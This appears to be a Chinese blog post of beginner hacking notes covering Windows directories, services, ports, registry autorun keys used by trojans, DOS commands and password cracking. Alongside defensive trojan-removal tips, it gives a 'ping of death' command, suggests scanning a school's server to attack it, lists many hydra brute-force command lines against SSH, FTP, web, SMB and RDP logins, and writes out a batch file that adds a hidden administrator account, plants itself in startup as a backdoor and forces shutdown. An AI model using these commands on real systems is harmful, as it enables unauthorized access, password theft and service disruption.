- 系统登录,服务,端口,注册表
系统目录:
windows
program files
用户
perflogs 是windows7的日志信息,如磁盘扫描错误信息,删除可以,但是不建议删除,删除反而会降低系统速度,perflogs是系统自动生成的。
mydrivers是安装驱动的目录。
启动目录里的程序开机自启。
windows是系统安装目录,windows下的systerm32是系统配置文件,config下的SAM文件是存放windows用户密码的文件,带锁打不开,一般清密码进入pe系统删除此文件就可以清除密码,开机不再调用此文件,drivers下的etc中的hosts文件是用来解析域名的。
服务:
服务是一种应用程序类型,他在后台运行。服务应用程序通常可以在本地和通过网络为用户提供一些功能,列如客服端/服务器应用程序,web服务器,数据库服务器以及其他基于服务器的应用程序。
打开服务:win+r 输入services.msc
服务监听端口
服务的作用就决定了计算机的一些功能是否被启用,不同的服务对应的功能不同,通过计算机提供的服务可以有效的实现资源共享。
常见的服务:
web服务
dns服务:计算机无法识别域名,域名只是便于人类的记忆,所以需要dns服务解析域名变成IP进行访问
dhcp服务:给客户端分发ip
邮件服务
telnet服务:远程连接 A计算机打开telent服务 B计算机cmd telent A 的ip远程连接B
ssh服务:linux远程加密连接
ftp服务:上传下载
smb服务:文件共享,访问共享cmd输入\\共享主机ip、
端口:
计算机‘端口’是英文port的义译,可以认为是计算机与外界通讯交流的出口。按端口号可以分为3大类:公认端口;注册端口;动态和私有端口,共计65366个端口
攻击学校服务器可以扫一下它的端口,看看有哪些服务。
常见的端口有:
HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080
FTP(文件传输)协议代理服务器常用端口号:21
Telent(远程登录)协议代理服务器常用端口号:23
TFTP默认端口号为69/udp;
SSH(安全登录),scp(文件传输),端口重定向,默认的端口号为22/tcp
SMTP(E-mail)默认的端口号为25/tcp(木马Antigen,Emai,Password sender,Haebu Coceda,shtrilitz stealth,winPC,WinSpy都开放这个端口)
POP3(E-mail):110/tcp
TOMCAT:8080
WIN2003远程登录:3389
Orace数据库:1521
MS SQL*SERVER数据库server:1433/tcp 1433/udp
QQ:1080/udp
dos命令·,端口对应服务表
通过端口可以干什么?
信息收集
目标探测
服务判断
系统判断
系统角色分析
注册表,如果把电脑比作身体,那么注册表就是经络,可以通过注册表改你的桌面,改你的任何东西,后期安装后面时还有对管理员注册表进行克隆
打开注册表;
win+r 输入regedit
五个根目录:
在注册表中,所有的数据都是通过一种树状结构以键和子键的方式组织起来的,十分类似于目录结构。每个键都包含了一组特定的信息,每个键的的键名代表这个键的文件夹的左边将有“+”符号,以表示在这个文件夹中有更多的内容。如果这个文件夹被用户打开,那么“+”就会变成“-”。
HKEY-USERS
该根键保存了存放在本地计算机口令列表中的用户标识和密码列表。每个用户的预配置信息都存储在HKEY-USERS根键中。HKEY—USERS是远程计算机中访问的根键之一。
HKEY—CURRENT—USER
该根键包含了本地工作站中存放的当前登录的用户信息,包括用户登录名和存放的口令(注意,这个密码在输入的时候是隐藏的。)用户登录windos操作系统的时候,其信息从HKEY
USERS 中相应的项复制到HKEY—CURRENT—USER中。HKEY—CURRENT—CONFIG
该根键存放着当前用户桌面配置的数据、最后使用的文档列表和其他有关的当前用户的windows版本的安装信息等。
HKEY—CLASSES—ROOT
该根键根据windows操作系统中所安装的应用程序的扩展名,来指定文件类型。
HKEY—LOCAIMACHINE
该根键存放本地计算机的硬件信息,该根键下的子关键字包含在SYSTEM.DAT中用来提供HKEY—LOCAL—MACHINE所需要的信息,或者在远程计算机中可访问的一组键盘中。该根键下的许多与System.ini中的设置项类似。
利用注册表防病毒
1、
检查注册表中HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run和HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runserveice,查看键值中有没有自己不熟悉的自动启动文件,扩展名一般为EXE,然后记住木马程序的文件名,再在整个注册表中搜索,凡是看到了一样的文件名的键值就要删除,接着到电脑中找到木马文件的藏身地将其彻底删除。比如“爱虫”病毒会修改上面所提的第一项,BO2000木马会修改上面所提的第二项)。
2、
检查注册表HKEY_LOCAL_MACHINE和HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet
Explorer\Main中的几项(如Local
Page),如果发现键值被修改了,只要根据你的判断改回去就行了。恶意代码(如“万花谷”)就经常修改这几项。
3、检查HKEY_CLASSES_ROOT\inifile\shell\open\command和HKEY_CLASSES_ROOT\txtfile\shell\open\command等等几个常用文件类型的默认打开程序是否被更改。这个一定要改回来,很多病毒就是通过修改.txt、.ini等的默认打开程序而清除不了的。例如“罗密欧与朱丽叶”、BleBla病毒就修改了很多文件(包括.jpg、.rar、.mp3等)的默认打开程序。
检查你的系统配置文件
其实检查系统配置文件最好的方法是打开Windows“系统配置实用程序”(从开始菜单运行msconfig.exe),在里面你可以配置Config.sys、Autoexec.bat、system.ini和win.ini,并且可以选择启动系统的时间。
1、检查win.ini文件(在C:\windows下),打开后,在“WINDOWS”下面,“run=”和“load=”是可能加载“木马”程序的途径,必须仔细留心它们。在一般情况下,在它们的等号后面什么都没有,如果发现后面跟有路径与文件名不是你熟悉的启动文件,你的计算机就可能中上“木马”了。比如攻击QQ的“GOP木马”就会在这里留下痕迹。
2、检查system.ini文件(在C:\windows下),在BOOT下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”,如果不是“explorer.exe”,而是“shell=
explorer.exe 程序名”,那么后面跟着的那个程序就是“木马”程序,然后你就要在硬盘找到这个程序并将其删除了。
目前,只要新出的蠕虫/特洛伊类病毒一般都有修改系统注册表的动作。它们修改的位置一般有以下几个地方:
HKLM/Software/Microsoft/Windows/CurrentVersion/RunOnce/
说明:在系统启动时自动执行的程序
HKLM/Software/Microsoft/Windows/CurrentVersion/RunServices/
说明:在系统启动时自动执行的系统服务程序
HKLM/Software/Microsoft/Windows/CurrentVersion/Run/
说明:在系统启动时自动执行的程序,这是病毒最有可能修改/添加的地方。
例如:Win32.Swen.B病毒将增加:HKLM/Software/Microsoft/Windows/CurrentVersion/Run/ucfzyojza=
“cxsgrhcl.exe autorun” HKEY_CLASSES_ROOT/exefile/shell/open/command
说明:此键值能使病毒在用户运行任何EXE程序时被运行,以此类推,…/txtfile/… 或者 …/comfile/…
也可被更改,以便实现病毒自动运行的功能。 另外,有些健值还可能被利用来实现比较特别的功能:
有些病毒会通过修改下面的键值来阻止用户查看和修改注册表:
HKCU/Software/Microsoft/Windows/CurrentVersion/Policies/
System/DisableRegistryTools =
为了阻止用户利用.REG文件修改注册表键值,以下键值也会被修改来显示一个内存访问错误窗口 例如:Win32.Swen.B 病毒
会将缺省健值修改为: HKCR/regfile/shell/open/command/(Default) = “cxsgrhcl.exe
showerror” 通过对以上地方的修改,病毒程序主要达到的目的是在系统启动或者程序运行过程中能够自动被执行,已达到自动激活的目的。
- 黑客常用的DOS命令及批处理文件的编写
color? 改变cmd的颜色
ping -t -l 65500 ip 死亡之ping,增大数据包,让服务器接收数据过多而奔溃
ITL 低于64的是linux win7 08 nt6.0的内核 128是xp和03,每过一个路由ITL值减一
ipconfig 查看ip地址 详细加参数all
ipconfig/release 释放ip,ip清空,就没有ip了,掉线
ipconfig/renew 从新获取ip , linux中是dhclient eth0
systeminfo 查看系统信息,提权的时候用的比较多,对比已知补丁,查找未安装补丁,利用已知漏洞。
arp -a所有接口下同一个网段的ip地址全部列出,局域网攻击用的比较多。
访问网关地址,进行局域网管理
net view 查看局域网下其他计算机名,确认目标进一步入侵
shutdown -s -t 180 -c “你被黑了,系统马上关机”
dir 查看目录
cd 切换目录
start www.baidu.com 打开网页
start 123.txt 打开123文本文件
copy con c:\123.txt 创建123 .txt文件 内容 ctrl+z
hellow cracer
type 123.txt
md 目录名 创建目录
rd 123 删除文件夹
ren 原文件名 新文件名 重命名文件名
del 删除文件
tree 目录树 树形列出文件夹结构
copy A文件 B位置 复制目录
move 移动文件
telent 远程连接
net use k:\192.1681.1\c$ 把服务器的c盘映射为本地的k盘
爆破管理员口令
net use k:\192.1681.1\c$/del 断开
net start 查看开启了哪些服务
net start 服务名 开启服务;(如net start telent,net start schedule)
net stop 服务名 关闭服务;
net user 用户名 密码 /add建立用户
net user guest/active:yes 激活guest用户
net user 查看有哪些用户
net user 账号名 查看账号名的属性
net localgroup administrators 用户名/add 把用户添加到管理员中使其具有管理员权限;
net user guest 12345 用guest用户登录后用将密码改为123456
net password 密码 更改系统登录密码
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$/del 删除ipc 共 享 n e t s h a r e c ‘ 共享 net share c` 共享netsharec‘`/del 删除c:$共享
暴力破解工具hydra
1、破解ssh: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p
密码字典 -t 线程 -o save.log -vV ip ssh 2、破解ftp: hydra ip ftp -l 用户名 -P
密码字典 -t 线程(默认16) -vV hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get
/admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get
/admin/index.php 4、post方式提交,破解web登录: hydra -l 用户名 -P 密码字典 -s 80 ip
http-post-form
“/admin/login.php:username=USER&password=PASS&submit=login:sorry
password” hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18
http-post-form “login.php:id=USER&passwd=PASS:wrong<br/> username or password ”
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止,
10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中 的内容是表示错误猜解的返回信息提示。) 5、破解https: hydra -m /index.php -l muts -P<br/> pass.txt 10.36.16.18 https 6、破解teamspeak: hydra -l 用户名 -P 密码字典 -s<br/> 端口号 -vV ip teamspeak 7、破解cisco: hydra -P pass.txt 10.36.16.18 cisco<br/> hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 8、破解smb: hydra<br/> -l administrator -P pass.txt 10.36.16.18 smb 9、破解pop3: hydra -l muts -P pass.txt my.pop3.mail pop3 10、破解rdp: hydra ip rdp -l administrator -P pass.txt -V 11、破解http-proxy: hydra -l admin -P<br/> pass.txt http-proxy://10.36.16.18 12、破解imap: hydra -L user.txt -p<br/> secret 10.36.16.18 imap PLAIN hydra -C defaults.txt -6<br/> imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
top1;连接c盘,爆破密码,写.bat批处理文件,copy con 123.batnet user zy /add net localgroup administrators zy /add shutdown -s -t 260 -c’‘you had hacked by zy’'将批处理文件放在桌面和启动项里,留后门,创建用户提权。
netstat -a查看开启了哪些端口,常用来查询可疑木马程序
netstart -n查看网络端口的连接情况
netstart -v查看正在进行的工作
at id号 开启已注册的某个计划任务
at/delete 停止所有计划任务,用参数 /yes则不需要确认就直接停止
at id号/delete停止某个已注册的计划任务
at 查看所有的计划任务
attrib 文件名(目录名)查看文件或(目录)的属性
attrib 文件名 -或+A,R,S,H去掉(添加)某文件的存档,只读,系统,隐藏属性
批处理文件
新建批处理文件
新建一个文本文档保存改后缀.bat
使用命令copy con 123.bat
写命令
4. 黑客常用的快捷键以及如何优化系统
f1 显示当前程序或者windowes帮助内容
f2 当你选中一个文件时,意味着重命名
f3 当你在桌面时是打开“查找:所有文件对话框”
alt+f4 关闭当前应用程序中的·当前文本
f5 刷新
ctrl+f5强行刷新
ctrl+f6切换到当前应用的下一个文本
f10或alt 激活当前程序的菜单栏
win建或ctrl+esc 打开开始菜单
ctrl+alt+delete 打开关闭程序对话框
delete删除
shift+delete永久删除
win+d 显示桌面
win+l 锁屏
win+e 打开我的电脑
win+f 查找
win+tab 桌面切换3d特效
系统优化:
修改启动项msconfig
提高窗口切换速度
使用工具优化比如360
5. 登录密码破解,手动清除密码病毒
windows登录密码破解:
使用U盘破解:
pe
运行windows登录密码破解菜单
使用工具对hash值破解:
lc5破解哈希值
彩虹表
手动清除木马;
查找开机启动项
查询服务
查看网络端口连接
netstat -o已连接的端口
木马启动项%开头读取注册表run
启动文件夹
6. 配置黑客桌面工作环境
雨滴桌面
端口区分端口尽量选择1024之后的
小旋风可以解析asp,php网站
Apache建站软件
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
